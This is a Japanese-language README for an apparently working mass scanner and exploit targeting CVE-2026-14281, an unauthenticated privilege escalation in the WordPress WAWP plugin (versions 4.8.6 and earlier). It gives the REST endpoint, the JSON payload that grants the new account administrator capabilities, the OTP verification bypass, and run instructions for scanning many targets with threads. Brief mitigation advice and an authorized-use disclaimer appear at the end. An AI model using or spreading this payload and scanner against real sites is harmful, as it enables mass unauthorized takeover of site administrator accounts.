
CVE-2026-14281(WordPress Automation Web PlatformプラグインにおけるRESTサインアップ経由の未認証権限昇格)に対する一括スキャナーおよび単一ターゲット向けエクスプロイト。
CVE-2026-14281 用の大量スキャナー + 単一ターゲット Exploit — WordPress Automation Web Platform (WAWP) プラグイン
<= 4.8.6における未認証の権限昇格。
WordPress プラグイン Automation Web Platform(101gen 製)における不適切な権限管理(CWE-269)。バージョン <= 4.8.6 が影響を受けます。
| 項目 | 値 |
|---|---|
| CVE | CVE-2026-14281 |
| 種類 | 未認証の権限昇格 |
| CVSS | 9.8 (CRITICAL) |
| 認証 | 不要 |
| 影響を受けるバージョン | WAWP プラグイン <= 4.8.6 |
このプラグインは公開 REST ルートを公開しています:
POST /wp-json/wawp/v1/signup/<op>
権限チェックはありません。ハンドラーは攻撃者が制御する wawp_custom_fields を update_user_meta() にコピーします — 許可リストはありません。攻撃者は以下を設定します:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
結果:新しいアカウントが administrator ロールを取得します。
OTP トークン(otp_transient)はレスポンスボディに平文で返されます。そのトークンを含む GET リクエストで検証済みとしてマークされます — メール/SMS は不要です。
wp_capabilities: administrator を含むペイロードを /wp-json/wawp/v1/signup/ に POST/wp-login.php にログイン/wp-admin/users.php にアクセスして確認3.7+requests、urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: ターゲットリストファイル、出力ファイル(デフォルト vuln.txt)、スレッド数(デフォルト 20)を入力します。
Verify Single: YA と入力し、ターゲット URL を入力します。ツールは一時的な管理者を作成し、検証してからクリーンアップします。
vuln.txt には確認された脆弱な URL のみが 1 行に 1 つずつ含まれます:
http://target1.com
https://target2.org
4.8.6 より新しいバージョンに更新する/wp-json/wawp/v1/signup/ をブロックするFor AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
Use it wisely. Knowledge is meant to protect, not to destroy.